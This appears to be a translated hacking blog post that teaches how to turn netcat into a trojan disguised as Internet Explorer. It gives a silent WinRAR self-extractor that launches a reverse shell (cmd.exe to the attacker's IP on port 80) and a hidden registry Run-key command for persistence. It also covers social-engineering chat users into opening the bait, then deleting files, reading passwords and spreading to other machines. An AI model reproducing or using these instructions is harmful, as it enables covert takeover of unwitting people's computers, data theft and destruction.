Trojanized NetCAT by WHK
As you know, with netcat can make a shell directly or perform a reverse connection indicating my DNS or IP address (for those who do not know what a DNS ... is a kind of translation that makes it easier to find your PC, such as IP would be 200.32.22.25 DNS = pagina.cl).
Well ... first you have to know what we will do ... the main idea is to take a shell of the PC of anyone of an IRC (Chat).
Materials:
ResHacker
Netcat v1.1 Winrar (graphic mode)
Internet Explorer icon .
Well, if you do not know where to find the icon will try to give it to this document XD if you can can use any icon (you can but also do no icons will be suspect.)
The first is to connect to a chat XD and achieved a victim (hopefully not do it with their girlfriends because if they get caught they're going to kick XD) ... Once you say .. "That's my victimaaaaa!" So we'll use something called social engineering and through the mill himself impersonating someone or made the friendship of that person in order to get what we want, the idea is to talk with and bla bla bla bla bla bla where you finish ... when you say that the next day we talked ... ps if all goes well tomorrow and have enough confidence to give a program that will help in maintaining your PC or just have fun with a game XD. We leave
chat and at night we start to make the Trojan in the following way:
Step 1: First we change the icon to make it less suspect to the ResHacker:
First open the ResHacker and give in "File / Open" and look for the netcat. After you click on action and then "Add a new Resource", then see the window you see to the right and click where it says "Open file with new resource" (step 3) to find the icon that we had, then where it says " Resource Name "Please enter the word" ICON "as seen in Photo and finally pressed the "Add Resource" and "File / Save." With all this you will create a backup of the original netcat you can delete it peacefully and to refresh the screen (F5) that netcat really has the same icon in Internet Explorer XD
Step 2: rename nc.exe and from now be called "iexplorer.exe" XD, then you click the netcat with the right button of your mouse and should look something like this (obviously after you have installed winrar.)
Winrar will then appear and begin to create our Trojan:
1.
For "Name File "we wrote" carnada.exe "(for now), the format should be in" RAR "the best compression method and finally and most importantly" Create SFX archive ", the rest should be unchecked.
2.
In the "Advanced" tab (above) you must click the button called "SFX Options" and begin to shape our Winrar SFX.
3.
Now "Extraction Folder" tell it to unzip the netcat (iexplorer named) in the directory =% HOMEDRIVE%% HOMEPATH% \\ update, I now will say: "What is this?!" ...% HOMEDRIVE% means that you unzip into the same drive that is Windows, which is usually (not always) "C: \\" ...% HOMEPATH% means "Documents and settings \\ your current user "in conclusion is decompressed within the user's root directory where it is almost the only place where a user without administrator rights can be overwritten, in other words if you had written% windir% \\ system32 may have been flawed to decompress and not everyone is entitled to that directory. Choose a folder called update to attract less attention.
In "Run after extraction" we write this = iexplorer.exe-d-e cmd.exe [here goes our ip] 80, I added the address 127.0.0.1 to test but you will get the real ip that comes to the Internet. 80 is the port where the Trojan will connect with us.
In "Run before extraction" we wrote the following =% windir% \\ system32 \\ cmd / c reg add HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v "iexplorer" / t REG_SZ / d "% homedrive %% HOMEPATH% \\ update \\ iexplorer.exe-d-e cmd.exe 127.0.0.1 80 "/ f> nul ... and you tell me what's that !!!!... we say that you run the CMD console and call an executable called "REG.EXE" which will add our entry into the system registry to start the Trojan alone every time you turn on the pc (remember that the phrase should put the ip 127.0.0.1 of you or in some cases (for those who know) your DNS is more effective .... ( Ask for the no-ip) and where it says> nul mean that the victim will not see more than a simple DOS pestaƱazo instead of displaying everything is running.
4.
Here we are asking winrar not display anything while installing this, so it will be quieter, faster and automated.
5.
I put yahoo icon because I'm going to try from the same chat.
Now let's create the program that will connect us with the victim, and is called "Customer"
Just run it and be ready to receive the connection of who opens the bait:
And ready now just need visit our friend the day before and say you have a really cool game and you have something to not ... use your imagination. In my case, I entered a room like yahoo and now this highly fashionable XD booters put in a room to come down to antibooter could not leave the room and pass on a link to the address where he was staying the Trojan. In a nutshell ... if someone falls in your wickedness you should see this:
You've taken the shell of another PC (run a shell from another pc means to control the Windows or DOS shell in GNU .. is able to control the command of the other person and through that you can raise your files , erase things, to give Trojans that allow you to view your desktop ... turning to look at their record passwords in text and making a "type" ... for those who know a little bit more .. maybe jump to other pc with netbios, exploits like dcom, access servers, where an entire network and ufff .. to the imagination. If you do not believe me look at these three sacks playing with netcat XD nothing serious:
1. The dream of every lick XD:
2. RealVnc4 rising to make a reverse connection and watch the other person's desktop (tutorial below):
3. This was a settling of accounts XD:
NOTE: Deleted files in the shell are not going to trash, are eliminated entirely
I showed how to create a Trojan with netcat (undetectable by all antivirus for now) also can be done with a direct connection instead of an inverse as I did here, and you know it
This is all and I hope to show you the next time .. Netcat v1.1 how to convert an SMTP client to send automated and timed post while serving as automated FTP client commands without the need for intervention by typing commands at the console, as well as put a password to a shell with netcat session among many other things
Salu2 Att. Yan. Unilola
Software.
"Knowledge liberates us" 
0 comments:
Post a Comment